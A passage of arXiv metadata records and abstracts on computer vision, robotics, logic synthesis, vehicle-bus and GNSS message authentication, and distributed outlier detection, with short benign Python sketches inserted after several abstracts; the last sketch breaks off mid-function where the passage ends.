https://floodlight.readthedocs.io
| null | null | null |
cs.HC
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
The present work introduces floodlight, an open source Python package built
to support and automate team sport data analysis. It is specifically designed
for the scientific analysis of spatiotemporal tracking data, event data, and
game codes in disciplines such as match and performance analysis, exercise
physiology, training science, and collective movement behavior analysis. It is
completely provider- and sports-independent and includes a high-level interface
suitable for programming beginners. The package includes routines for most
aspects of the data analysis process, including dedicated data classes, file
parsing functionality, public dataset APIs, pre-processing routines, common
data models and several standard analysis algorithms previously used in the
literature, as well as basic visualization functionality. The package is
intended to make team sport data analysis more accessible to sport scientists,
foster collaborations between sport and computer scientists, and strengthen the
community's culture of open science and the incorporation of previous work into
future work.
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 10:33:38 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Raabe",
"Dominik",
""
],
[
"Biermann",
"Henrik",
""
],
[
"Bassek",
"Manuel",
""
],
[
"Wohlan",
"Martin",
""
],
[
"Komitova",
"Rumena",
""
],
[
"Rein",
"Robert",
""
],
[
"Groot",
"Tobias Kuppens",
""
],
[
"Memmert",
"Daniel",
""
]
] |
new_dataset
| 0.987416 |
2206.02573
|
Yi Cheng
|
Yi Cheng, Fen Fang, Ying Sun
|
Team VI-I2R Technical Report on EPIC-KITCHENS-100 Unsupervised Domain
Adaptation Challenge for Action Recognition 2021
| null | null | null | null |
cs.CV cs.AI
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
In this report, we present the technical details of our approach to the
EPIC-KITCHENS-100 Unsupervised Domain Adaptation (UDA) Challenge for Action
Recognition. The EPIC-KITCHENS-100 dataset consists of daily kitchen activities
focusing on the interaction between human hands and their surrounding objects.
It is very challenging to accurately recognize these fine-grained activities,
due to the presence of distracting objects and visually similar action classes,
especially in the unlabelled target domain. Based on an existing method for
video domain adaptation, i.e., TA3N, we propose to learn hand-centric features
by leveraging the hand bounding box information for UDA on fine-grained action
recognition. This helps reduce distraction from the background and facilitates
the learning of domain-invariant features. To achieve high-quality
hand localization, we adopt an uncertainty-aware domain adaptation network,
i.e., MEAA, to train a domain-adaptive hand detector, which only uses very
limited hand bounding box annotations in the source domain but can generalize
well to the unlabelled target domain. Our submission achieved the 1st place in
terms of top-1 action recognition accuracy, using only RGB and optical flow
modalities as input.
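The hand-centric idea can be illustrated with a simple cropping step; the detector outputs, padding, and downstream backbone below are stand-ins, not the TA3N/MEAA pipeline itself.

```python
# Sketch: hand-centric feature extraction by cropping detected hand boxes
# from a frame before feeding a recognition backbone.
import numpy as np

def crop_hand_regions(frame: np.ndarray, boxes, pad: int = 8):
    """frame: HxWx3 array; boxes: list of (x1, y1, x2, y2) hand detections."""
    h, w = frame.shape[:2]
    crops = []
    for x1, y1, x2, y2 in boxes:
        x1, y1 = max(0, x1 - pad), max(0, y1 - pad)   # pad and clamp to frame
        x2, y2 = min(w, x2 + pad), min(h, y2 + pad)
        crops.append(frame[y1:y2, x1:x2])
    return crops

frame = np.zeros((224, 224, 3), dtype=np.uint8)
print([c.shape for c in crop_hand_regions(frame, [(50, 60, 120, 140)])])
```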
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 07:37:48 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Cheng",
"Yi",
""
],
[
"Fang",
"Fen",
""
],
[
"Sun",
"Ying",
""
]
] |
new_dataset
| 0.999663 |
2206.02602
|
Franco Oberti
|
Franco Oberti, Ernesto Sanchez, Alessandro Savino, Filippo Parisi,
Mirco Brero, and Stefano Di Carlo
|
LIN-MM: Multiplexed Message Authentication Code for Local Interconnect
Network message authentication in road vehicles
| null | null | null | null |
cs.CR
|
http://creativecommons.org/licenses/by-nc-sa/4.0/
|
With the constant shift toward interconnected vehicles, the automotive market
has become a profitable target for cyberattacks. Electronic Control Units
(ECUs) installed on cars often operate in critical and hostile environments.
Hence, both carmakers
and governments have supported initiatives to mitigate risks and threats
belonging to the automotive domain. The Local Interconnect Network (LIN) is one
of the most used communication protocols in the automotive field. Today's LIN
buses have just a few lightweight security mechanisms to assure integrity
through Message Authentication Codes (MACs). However, several strong
constraints make applying those techniques to LIN networks challenging, leaving
several vehicles still unprotected. This paper presents LIN Multiplexed MAC
(LINMM), a new approach for exploiting signal modulation to multiplex MAC data
with standard LIN communication. LINMM allows for transmitting MAC payloads,
maintaining full backward compatibility with all versions of the standard LIN
protocol.
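As a rough illustration of carrying a MAC alongside a standard LIN payload, the sketch below computes a truncated HMAC over a frame; the key handling, counter, and truncation length are assumptions, and the paper's modulation-based multiplexing is not reproduced here.

```python
# Sketch: a truncated MAC over a LIN frame payload with HMAC-SHA256.
# Key, counter, and 4-byte truncation are illustrative assumptions.
import hmac, hashlib

def lin_mac(key: bytes, frame_id: int, payload: bytes,
            counter: int, nbytes: int = 4) -> bytes:
    msg = bytes([frame_id]) + counter.to_bytes(4, "big") + payload
    return hmac.new(key, msg, hashlib.sha256).digest()[:nbytes]

tag = lin_mac(b"\x00" * 16, frame_id=0x23, payload=b"\x01\x02\x03\x04", counter=7)
print(tag.hex())
```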
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 13:19:57 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Oberti",
"Franco",
""
],
[
"Sanchez",
"Ernesto",
""
],
[
"Savino",
"Alessandro",
""
],
[
"Parisi",
"Filippo",
""
],
[
"Brero",
"Mirco",
""
],
[
"Di Carlo",
"Stefano",
""
]
] |
new_dataset
| 0.999184 |
2206.02619
|
Illia Oleksiienko
|
Illia Oleksiienko, Paraskevi Nousi, Nikolaos Passalis, Anastasios
Tefas and Alexandros Iosifidis
|
VPIT: Real-time Embedded Single Object 3D Tracking Using Voxel Pseudo
Images
|
10 pages, 5 figures, 4 tables. This work has been submitted to the
IEEE for possible publication. Copyright may be transferred without notice,
after which this version may no longer be accessible
| null | null | null |
cs.CV
|
http://creativecommons.org/licenses/by/4.0/
|
In this paper, we propose a novel voxel-based 3D single object tracking (3D
SOT) method called Voxel Pseudo Image Tracking (VPIT). VPIT is the first method
that uses voxel pseudo images for 3D SOT. The input point cloud is structured
by pillar-based voxelization, and the resulting pseudo image is used as an
input to a 2D-like Siamese SOT method. The pseudo image is created in the
Bird's-eye View (BEV) coordinates, and therefore the objects in it have
constant size. Thus, only the object rotation can change in the new coordinate
system and not the object scale. For this reason, we replace multi-scale search
with a multi-rotation search, where differently rotated search regions are
compared against a single target representation to predict both position and
rotation of the object. Experiments on the KITTI Tracking dataset show that
VPIT is the fastest 3D SOT method and maintains competitive Success and
Precision values. Applying a SOT method in a real-world scenario faces
limitations such as the lower computational capabilities of embedded devices
and a latency-unforgiving environment, where the method is forced to skip
certain
data frames if the inference speed is not high enough. We implement a real-time
evaluation protocol and show that other methods lose most of their performance
on embedded devices, while VPIT maintains its ability to track the object.
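A minimal sketch of the multi-rotation search, with plain cross-correlation standing in for the learned Siamese scoring network; the angle set and region sizes are illustrative assumptions.

```python
# Sketch: score differently rotated BEV search regions against one template.
import numpy as np
from scipy.ndimage import rotate

def best_rotation(search: np.ndarray, template: np.ndarray, angles):
    scores = []
    th, tw = template.shape
    for a in angles:
        rot = rotate(search, a, reshape=False, order=1)  # rotate search region
        cy, cx = rot.shape[0] // 2, rot.shape[1] // 2    # center crop
        patch = rot[cy - th // 2: cy - th // 2 + th,
                    cx - tw // 2: cx - tw // 2 + tw]
        scores.append(float((patch * template).sum()))   # correlation score
    return angles[int(np.argmax(scores))], scores

angles = [-10, -5, 0, 5, 10]
print(best_rotation(np.random.rand(64, 64), np.random.rand(16, 16), angles)[0])
```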
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 14:02:06 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Oleksiienko",
"Illia",
""
],
[
"Nousi",
"Paraskevi",
""
],
[
"Passalis",
"Nikolaos",
""
],
[
"Tefas",
"Anastasios",
""
],
[
"Iosifidis",
"Alexandros",
""
]
] |
new_dataset
| 0.987608 |
2206.02715
|
Abhijith Punnappurath
|
Abhijith Punnappurath, Abdullah Abuolaim, Abdelrahman Abdelhamed, Alex
Levinshtein and Michael S. Brown
|
Day-to-Night Image Synthesis for Training Nighttime Neural ISPs
| null | null | null | null |
cs.CV eess.IV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Many flagship smartphone cameras now use a dedicated neural image signal
processor (ISP) to render noisy raw sensor images to the final processed
output. Training nightmode ISP networks relies on large-scale datasets of image
pairs with: (1) a noisy raw image captured with a short exposure and a high ISO
gain; and (2) a ground truth low-noise raw image captured with a long exposure
and low ISO that has been rendered through the ISP. Capturing such image pairs
is tedious and time-consuming, requiring careful setup to ensure alignment
between the image pairs. In addition, ground truth images are often prone to
motion blur due to the long exposure. To address this problem, we propose a
method that synthesizes nighttime images from daytime images. Daytime images
are easy to capture, exhibit low noise (even on smartphone cameras), and rarely
suffer from motion blur. We outline a processing framework to convert daytime
raw images to have the appearance of realistic nighttime raw images with
different levels of noise. Our procedure allows us to easily produce aligned
noisy and clean nighttime image pairs. We show the effectiveness of our
synthesis framework by training neural ISPs for nightmode rendering.
Furthermore, we demonstrate that using our synthetic nighttime images together
with small amounts of real data (e.g., 5% to 10%) yields performance almost on
par with training exclusively on real nighttime images. Our dataset and code
are available at https://github.com/SamsungLabs/day-to-night.
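The day-to-night idea can be sketched as darkening a clean daytime raw image and injecting signal-dependent noise; the gain values and noise model below are illustrative assumptions, not the paper's calibrated procedure.

```python
# Sketch: synthesize a (clean, noisy) nighttime raw pair from a daytime raw.
import numpy as np

def day_to_night(raw_day: np.ndarray, darkening: float = 0.02,
                 iso_gain: float = 16.0, read_std: float = 2.0,
                 white_level: float = 1023.0, rng=None):
    rng = rng or np.random.default_rng(0)
    clean_night = raw_day * darkening                        # "long exposure" GT
    electrons = rng.poisson(np.clip(clean_night, 0, None))   # shot noise
    noisy = electrons * iso_gain + rng.normal(0.0, read_std, raw_day.shape)
    return clean_night, np.clip(noisy, 0, white_level)       # "short exposure"

day = np.full((4, 4), 800.0)
gt, noisy = day_to_night(day)
print(gt.mean(), noisy.mean())
```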
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 16:15:45 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Punnappurath",
"Abhijith",
""
],
[
"Abuolaim",
"Abdullah",
""
],
[
"Abdelhamed",
"Abdelrahman",
""
],
[
"Levinshtein",
"Alex",
""
],
[
"Brown",
"Michael S.",
""
]
] |
new_dataset
| 0.990398 |
2206.02732
|
Tarunraj Singh
|
Youngjin Kim and Tarunraj Singh
|
Energy-Time Optimal Control of Wheeled Mobile Robots
|
36 pages,6 figures, 3 appendices
|
Journal of the Franklin Institute, 2022
|
10.1016/j.jfranklin.2022.05.032
| null |
cs.RO math.OC
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
This paper focuses on the energy-time optimal control of wheeled mobile
robots undergoing point-to-point transitions in an obstacles free space. Two
interchangeable models are used to arrive at the necessary conditions for
optimality. The first formulation exploits the Hamiltonian, while the second
formulation considers the first variation of the augmented cost to derive the
necessary conditions for optimality. Jacobi elliptic functions are shown to
parameterize the closed form solutions for the states, control and costates.
Analysis of the optimal controls reveals that they are constrained to lie on a
cylinder whose circular cross-section is a function of the weight penalizing
the relative costs of time and energy. The evolving optimal costates for the
second formulation are shown to lie on the intersection of two cylinders. The
optimal control for the wheeled mobile robot undergoing point-to-point motion
is also developed where the linear velocity is constrained to be
time-invariant. It is shown that the costates are constrained to lie on the
intersection of a cylinder and an extruded parabola. Numerical results for
various point-to-point maneuvers are presented to illustrate the change in the
structure of the optimal trajectories as a function of the relative location of
the terminal and initial states.
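Since the closed-form solutions are parameterized by Jacobi elliptic functions, they can be evaluated directly with SciPy; the parameter values below are arbitrary, illustrating the functions rather than the paper's actual solution.

```python
# Sketch: evaluating Jacobi elliptic functions sn, cn, dn with scipy.
import numpy as np
from scipy.special import ellipj

u = np.linspace(0.0, 4.0, 9)
sn, cn, dn, ph = ellipj(u, 0.5)     # parameter m = k^2 = 0.5 (illustrative)
print(np.round(sn, 3))
print(np.round(sn**2 + cn**2, 3))   # identity sn^2 + cn^2 = 1
```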
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 16:41:32 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Kim",
"Youngjin",
""
],
[
"Singh",
"Tarunraj",
""
]
] |
new_dataset
| 0.996312 |
2206.02760
|
Khaleel Mershad
|
Omar Cheikhrouhou, Ichrak Amdouni, Khaleel Mershad, Maryem Ammi, and
Tuan Nguyen Gia
|
Blockchain for the Cybersecurity of Smart City Applications
|
65 pages, 6 figures, 37 tables
| null | null | null |
cs.CR
|
http://creativecommons.org/licenses/by/4.0/
|
Cybersecurity is an essential requirement that should be addressed before the
large-scale deployment of smart city applications. Recently, Blockchain has
emerged as a promising technology to provide several cybersecurity aspects of smart
city applications. This paper provides a comprehensive review of the existing
blockchain-based solutions for the cybersecurity of the main smart city
applications, namely smart healthcare, smart transportation, smart agriculture,
supply chain management, smart grid, and smart homes. We describe the existing
solutions and discuss their merits and limitations. Moreover, we define the
security requirements of each smart city application and we give a mapping of
the studied solutions to these defined requirements. Additionally, future
directions are given. We believe that the present survey is a good starting
point for every researcher in the fields of cybersecurity, blockchain, and
smart cities.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 17:37:51 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Cheikhrouhou",
"Omar",
""
],
[
"Amdouni",
"Ichrak",
""
],
[
"Mershad",
"Khaleel",
""
],
[
"Ammi",
"Maryem",
""
],
[
"Gia",
"Tuan Nguyen",
""
]
] |
new_dataset
| 0.998103 |
1805.05121
|
Mathias Soeken
|
Mathias Soeken, Heinz Riener, Winston Haaswijk, Eleonora Testa, Bruno
Schmitt, Giulia Meuli, Fereshte Mozafari, Siang-Yun Lee, Alessandro Tempia
Calvino, Dewmini Sudara Marakkalage, Giovanni De Micheli
|
The EPFL Logic Synthesis Libraries
|
13 pages, originally accepted at Int'l Workshop on Logic & Synthesis
2018, extended for Workshop on Open-Source EDA Technology 2019
| null | null | null |
cs.LO cs.MS
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We present a collection of modular open source C++ libraries for the
development of logic synthesis applications. These libraries can be used to
develop applications for the design of classical and emerging technologies, as
well as for the implementation of quantum compilers. All libraries are well
documented and well tested. Furthermore, being header-only, the libraries can
be readily used as core components in complex logic synthesis systems.
|
[
{
"version": "v1",
"created": "Mon, 14 May 2018 11:34:47 GMT"
},
{
"version": "v2",
"created": "Wed, 6 Nov 2019 14:02:30 GMT"
},
{
"version": "v3",
"created": "Fri, 3 Jun 2022 09:33:52 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Soeken",
"Mathias",
""
],
[
"Riener",
"Heinz",
""
],
[
"Haaswijk",
"Winston",
""
],
[
"Testa",
"Eleonora",
""
],
[
"Schmitt",
"Bruno",
""
],
[
"Meuli",
"Giulia",
""
],
[
"Mozafari",
"Fereshte",
""
],
[
"Lee",
"Siang-Yun",
""
],
[
"Calvino",
"Alessandro Tempia",
""
],
[
"Marakkalage",
"Dewmini Sudara",
""
],
[
"De Micheli",
"Giovanni",
""
]
] |
new_dataset
| 0.999821 |
2108.12285
|
Rob Scharff
|
Sander C. van den Berg, Rob B.N. Scharff, Zolt\'an Rus\'ak, and Jun Wu
|
OpenFish: Biomimetic Design of a Soft Robotic Fish for High Speed
Locomotion
| null |
HardwareX, 2022, e00320, ISSN 2468-0672,
(https://www.sciencedirect.com/science/article/pii/S2468067222000657)
|
10.1016/j.ohx.2022.e00320
| null |
cs.RO
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We present OpenFish: an open source soft robotic fish which is optimized for
speed and efficiency. The soft robotic fish uses a combination of an active and
passive tail segment to accurately mimic the thunniform swimming mode. Through
the implementation of a novel propulsion system that is capable of achieving
higher oscillation frequencies with a more sinusoidal waveform, the open source
soft robotic fish achieves a top speed of $0.85~\mathrm{m/s}$, thereby
outperforming the previously reported fastest soft robotic fish by $27\%$.
Besides the propulsion system, the optimization of the fish morphology played a
crucial role in achieving this speed. In this work, a detailed description of
the design, construction and customization of the soft robotic fish is
presented. We hope this open source design will accelerate future research and
development in soft robotic fish.
|
[
{
"version": "v1",
"created": "Tue, 20 Jul 2021 08:38:08 GMT"
},
{
"version": "v2",
"created": "Fri, 3 Jun 2022 12:48:12 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Berg",
"Sander C. van den",
""
],
[
"Scharff",
"Rob B. N.",
""
],
[
"Rusák",
"Zoltán",
""
],
[
"Wu",
"Jun",
""
]
] |
new_dataset
| 0.998022 |
2109.13410
|
Yiyi Liao
|
Yiyi Liao, Jun Xie, Andreas Geiger
|
KITTI-360: A Novel Dataset and Benchmarks for Urban Scene Understanding
in 2D and 3D
|
arXiv admin note: text overlap with arXiv:1511.03240
| null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
For the last few decades, several major subfields of artificial intelligence
including computer vision, graphics, and robotics have progressed largely
independently from each other. Recently, however, the community has realized
that progress towards robust intelligent systems such as self-driving cars
requires a concerted effort across the different fields. This motivated us to
develop KITTI-360, successor of the popular KITTI dataset. KITTI-360 is a
suburban driving dataset which comprises richer input modalities, comprehensive
semantic instance annotations and accurate localization to facilitate research
at the intersection of vision, graphics and robotics. For efficient annotation,
we created a tool to label 3D scenes with bounding primitives and developed a
model that transfers this information into the 2D image domain, resulting in
over 150k images and 1B 3D points with coherent semantic instance annotations
across 2D and 3D. Moreover, we established benchmarks and baselines for several
tasks relevant to mobile perception, encompassing problems from computer
vision, graphics, and robotics on the same dataset, e.g., semantic scene
understanding, novel view synthesis and semantic SLAM. KITTI-360 will enable
progress at the intersection of these research areas and thus contribute
towards solving one of today's grand challenges: the development of fully
autonomous self-driving systems.
|
[
{
"version": "v1",
"created": "Tue, 28 Sep 2021 00:41:29 GMT"
},
{
"version": "v2",
"created": "Fri, 3 Jun 2022 07:09:53 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Liao",
"Yiyi",
""
],
[
"Xie",
"Jun",
""
],
[
"Geiger",
"Andreas",
""
]
] |
new_dataset
| 0.999854 |
2112.01085
|
Ziao Yang
|
Ziao Yang, Xiangrui Yang and Qifeng Lin
|
PTCT: Patches with 3D-Temporal Convolutional Transformer Network for
Precipitation Nowcasting
|
9 pages, 3 figures
| null | null | null |
cs.CV cs.MM
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Precipitation nowcasting aims to predict the future rainfall intensity over a
short period of time, which mainly relies on the prediction of radar echo
sequences. Though convolutional neural networks (CNNs) and recurrent neural
networks (RNNs) are widely used to generate radar echo frames, they suffer from
inductive bias (i.e., translation invariance and locality) and seriality,
respectively. Recently, Transformer-based methods have also gained much
attention due to the great potential of the Transformer structure, although
short-term dependencies and the autoregressive characteristic are ignored. In
this paper, we
propose a variant of Transformer named patches with 3D-temporal convolutional
Transformer network (PTCT), where original frames are split into multiple
patches to remove the constraint of inductive bias and 3D-temporal convolution
is employed to capture short-term dependencies efficiently. After training, the
inference of PTCT is performed in an autoregressive way to ensure the quality
of generated radar echo frames. To validate our algorithm, we conduct
experiments on two radar echo datasets: Radar Echo Guangzhou and HKO-7. The
experimental results show that PTCT achieves state-of-the-art (SOTA)
performance compared with existing methods.
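The patch-splitting step can be sketched as a pure reshape; the patch size and frame shape below are assumptions, and the 3D-temporal convolution itself is omitted.

```python
# Sketch: split radar echo frames into non-overlapping patches for a
# Transformer-style input, removing the convolutional inductive bias.
import numpy as np

def to_patches(frames: np.ndarray, p: int):
    """frames: (T, H, W) with H, W divisible by p -> (T, H//p * W//p, p*p)."""
    t, h, w = frames.shape
    x = frames.reshape(t, h // p, p, w // p, p)
    x = x.transpose(0, 1, 3, 2, 4)                 # (T, H/p, W/p, p, p)
    return x.reshape(t, (h // p) * (w // p), p * p)

print(to_patches(np.zeros((10, 64, 64)), p=8).shape)  # (10, 64, 64)
```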
|
[
{
"version": "v1",
"created": "Thu, 2 Dec 2021 10:05:01 GMT"
},
{
"version": "v2",
"created": "Fri, 3 Jun 2022 04:50:30 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Yang",
"Ziao",
""
],
[
"Yang",
"Xiangrui",
""
],
[
"Lin",
"Qifeng",
""
]
] |
new_dataset
| 0.99652 |
2203.03405
|
Valentina Musat
|
Valentina Musat, Daniele De Martini, Matthew Gadd and Paul Newman
|
Depth-SIMS: Semi-Parametric Image and Depth Synthesis
| null | null | null | null |
cs.CV cs.RO
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
In this paper we present a compositing image synthesis method that generates
RGB canvases with well aligned segmentation maps and sparse depth maps, coupled
with an in-painting network that transforms the RGB canvases into high quality
RGB images and the sparse depth maps into pixel-wise dense depth maps. We
benchmark our method in terms of structural alignment and image quality,
showing an increase in mIoU over SOTA by 3.7 percentage points and a highly
competitive FID. Furthermore, we analyse the quality of the generated data as
training data for semantic segmentation and depth completion, and show that our
approach is more suited for this purpose than other methods.
|
[
{
"version": "v1",
"created": "Mon, 7 Mar 2022 13:58:32 GMT"
},
{
"version": "v2",
"created": "Thu, 2 Jun 2022 20:28:27 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Musat",
"Valentina",
""
],
[
"De Martini",
"Daniele",
""
],
[
"Gadd",
"Matthew",
""
],
[
"Newman",
"Paul",
""
]
] |
new_dataset
| 0.998985 |
2204.08129
|
Xun Long Ng
|
Xun Long Ng, Kian Eng Ong, Qichen Zheng, Yun Ni, Si Yong Yeo, Jun Liu
|
Animal Kingdom: A Large and Diverse Dataset for Animal Behavior
Understanding
|
Accepted by CVPR2022 (Oral). Dataset:
https://sutdcv.github.io/Animal-Kingdom
| null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Understanding animals' behaviors is significant for a wide range of
applications. However, existing animal behavior datasets have limitations in
multiple aspects, including limited numbers of animal classes, data samples and
provided tasks, and also limited variations in environmental conditions and
viewpoints. To address these limitations, we create a large and diverse
dataset, Animal Kingdom, that provides multiple annotated tasks to enable a
more thorough understanding of natural animal behaviors. The wild animal
footage used in our dataset records different times of the day in an extensive
range of environments containing variations in backgrounds, viewpoints,
illumination and weather conditions. More specifically, our dataset contains 50
hours of annotated videos to localize relevant animal behavior segments in long
videos for the video grounding task, 30K video sequences for the fine-grained
multi-label action recognition task, and 33K frames for the pose estimation
task, which correspond to a diverse range of animals with 850 species across 6
major animal classes. Such a challenging and comprehensive dataset shall be
able to facilitate the community to develop, adapt, and evaluate various types
of advanced methods for animal behavior analysis. Moreover, we propose a
Collaborative Action Recognition (CARe) model that learns general and specific
features for action recognition with unseen new animals. This method achieves
promising performance in our experiments. Our dataset can be found at
https://sutdcv.github.io/Animal-Kingdom.
|
[
{
"version": "v1",
"created": "Mon, 18 Apr 2022 02:05:15 GMT"
},
{
"version": "v2",
"created": "Fri, 3 Jun 2022 14:00:22 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Ng",
"Xun Long",
""
],
[
"Ong",
"Kian Eng",
""
],
[
"Zheng",
"Qichen",
""
],
[
"Ni",
"Yun",
""
],
[
"Yeo",
"Si Yong",
""
],
[
"Liu",
"Jun",
""
]
] |
new_dataset
| 0.999799 |
2204.14026
|
Ignacio Fernandez-Hernandez
|
Ignacio Fernandez-Hernandez, Simon Cancela, Rafael Terris-Gallego,
Gonzalo Seco-Granados, Jos\'e A. L\'opez-Salcedo, C. O'Driscoll, J. Winkel,
A. dalla Chiara, C. Sarto, Vincent Rijmen, Daniel Blonski, Javier de Blas
|
Semi-Assisted Signal Authentication based on Galileo ACAS
| null | null | null | null |
cs.CR eess.SP
|
http://creativecommons.org/licenses/by/4.0/
|
A GNSS signal authentication concept named semi-assisted authentication is
proposed. It is based on the re-encryption and publication of keystream
sequences of a few milliseconds from an already existing encrypted signal. A
few seconds after the keystreams are transmitted in the signal-in-space, the
signal broadcasts the key, allowing the receiver to decrypt the sequences and
perform a-posteriori correlation. The concept is particularized as Galileo Assisted
Commercial Authentication Service, or ACAS, for Galileo E1-B, with OSNMA used
for the decryption keys, and E6C, assumed to be encrypted in the near future.
This work proposes the ACAS cryptographic operations and a model for signal
processing and authentication verification. Semi-assisted authentication can be
provided without any modification to the signal plan of an existing GNSS,
without the disclosure of signal encryption keys, and for several days of
receiver autonomy, depending on its storage capabilities.
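The a-posteriori correlation step can be sketched as follows: the receiver stores a signal snapshot, later decrypts the published keystream, and correlates; the chip model, SNR, and threshold below are toy assumptions.

```python
# Sketch: a-posteriori correlation of a stored snapshot against the
# later-decrypted keystream chips.
import numpy as np

rng = np.random.default_rng(1)
chips = rng.integers(0, 2, 1000) * 2 - 1           # decrypted keystream (+/-1)
received = 0.8 * chips + rng.normal(0, 1, 1000)    # stored signal snapshot

score = float(np.dot(received, chips)) / len(chips)
print("correlation:", round(score, 3), "authentic:", score > 0.5)
```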
|
[
{
"version": "v1",
"created": "Fri, 29 Apr 2022 11:52:20 GMT"
},
{
"version": "v2",
"created": "Mon, 2 May 2022 07:45:45 GMT"
},
{
"version": "v3",
"created": "Fri, 3 Jun 2022 10:31:56 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Fernandez-Hernandez",
"Ignacio",
""
],
[
"Cancela",
"Simon",
""
],
[
"Terris-Gallego",
"Rafael",
""
],
[
"Seco-Granados",
"Gonzalo",
""
],
[
"López-Salcedo",
"José A.",
""
],
[
"O'Driscoll",
"C.",
""
],
[
"Winkel",
"J.",
""
],
[
"Chiara",
"A. dalla",
""
],
[
"Sarto",
"C.",
""
],
[
"Rijmen",
"Vincent",
""
],
[
"Blonski",
"Daniel",
""
],
[
"de Blas",
"Javier",
""
]
] |
new_dataset
| 0.998585 |
2205.08964
|
Ying Zhao
|
Ying Zhao
|
Skew constacyclic codes over a class of finite commutative semisimple
rings
| null | null | null | null |
cs.IT math.IT math.RA
|
http://creativecommons.org/licenses/by/4.0/
|
In this article, we study skew constacyclic codes over a class of finite
commutative semisimple rings. The automorphism group of
$\mathcal{R}=\prod_{i=1}^t F_q$ is determined, and we characterize skew
constacyclic codes over the ring by linear codes over the finite field. We also
define homomorphisms which map linear codes over $\mathcal{R}$ to matrix
product codes over $F_q$; some optimal linear codes over finite fields are
obtained.
|
[
{
"version": "v1",
"created": "Wed, 18 May 2022 14:40:44 GMT"
},
{
"version": "v2",
"created": "Fri, 3 Jun 2022 06:19:26 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Zhao",
"Ying",
""
]
] |
new_dataset
| 0.980908 |
2205.10233
|
Alejandro Vaca Serrano
|
Alejandro Vaca Serrano, Guillem Garcia Subies, Helena Montoro
Zamorano, Nuria Aldama Garcia, Doaa Samy, David Betancur Sanchez, Antonio
Moreno Sandoval, Marta Guerrero Nieto, Alvaro Barbero Jimenez
|
RigoBERTa: A State-of-the-Art Language Model For Spanish
| null | null | null | null |
cs.CL
|
http://creativecommons.org/licenses/by/4.0/
|
This paper presents RigoBERTa, a State-of-the-Art Language Model for Spanish.
RigoBERTa is trained on a well-curated corpus formed from different
subcorpora with key features. It follows the DeBERTa architecture, which has
several advantages over other architectures of similar size as BERT or RoBERTa.
RigoBERTa performance is assessed over 13 NLU tasks in comparison with other
available Spanish language models, namely, MarIA, BERTIN and BETO. RigoBERTa
outperformed the three models in 10 out of the 13 tasks, achieving new
"State-of-the-Art" results.
|
[
{
"version": "v1",
"created": "Wed, 27 Apr 2022 11:53:25 GMT"
},
{
"version": "v2",
"created": "Thu, 2 Jun 2022 11:23:51 GMT"
},
{
"version": "v3",
"created": "Fri, 3 Jun 2022 07:09:45 GMT"
}
] | 2022-06-06T00:00:00 |
[
[
"Serrano",
"Alejandro Vaca",
""
],
[
"Subies",
"Guillem Garcia",
""
],
[
"Zamorano",
"Helena Montoro",
""
],
[
"Garcia",
"Nuria Aldama",
""
],
[
"Samy",
"Doaa",
""
],
[
"Sanchez",
"David Betancur",
""
],
[
"Sandoval",
"Antonio Moreno",
""
],
[
"Nieto",
"Marta Guerrero",
""
],
[
"Jimenez",
"Alvaro Barbero",
""
]
] |
new_dataset
| 0.978813 |
2206.01281
|
Leman Akoglu
|
Sean Zhang, Varun Ursekar, Leman Akoglu
|
Sparx: Distributed Outlier Detection at Scale
|
11 pages, 7 figures, 14 tables
|
ACM SIGKDD 2022
|
10.1145/3534678.3539076
| null |
cs.DC cs.DB
|
http://creativecommons.org/licenses/by-nc-sa/4.0/
|
There is no shortage of outlier detection (OD) algorithms in the literature,
yet a vast body of them are designed for a single machine. With the increasing
reality of already cloud-resident datasets comes the need for distributed OD
techniques. This area, however, is not only understudied but also short of
public-domain implementations for practical use. This paper aims to fill this
gap: We design Sparx, a data-parallel OD algorithm suitable for shared-nothing
infrastructures, which we specifically implement in Apache Spark. Through
extensive experiments on three real-world datasets, with several billions of
points and millions of features, we show that existing open-source solutions
fail to scale up, either with a large number of points or with high dimensionality,
whereas Sparx yields scalable and effective performance. To facilitate
practical use of OD on modern-scale datasets, we open-source Sparx under the
Apache license at https://tinyurl.com/sparx2022.
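The shared-nothing, data-parallel pattern Sparx builds on can be sketched in PySpark; the per-partition scoring function below is a simple distance-to-mean stand-in, not the Sparx algorithm.

```python
# Sketch: data-parallel outlier scoring with mapPartitions in PySpark.
import numpy as np
from pyspark.sql import SparkSession

spark = SparkSession.builder.appName("od-sketch").getOrCreate()
rdd = spark.sparkContext.parallelize(np.random.rand(10_000, 8).tolist(),
                                     numSlices=8)

def score_partition(rows):
    x = np.array(list(rows))
    if x.size == 0:
        return iter([])
    mu = x.mean(axis=0)                              # per-partition statistics
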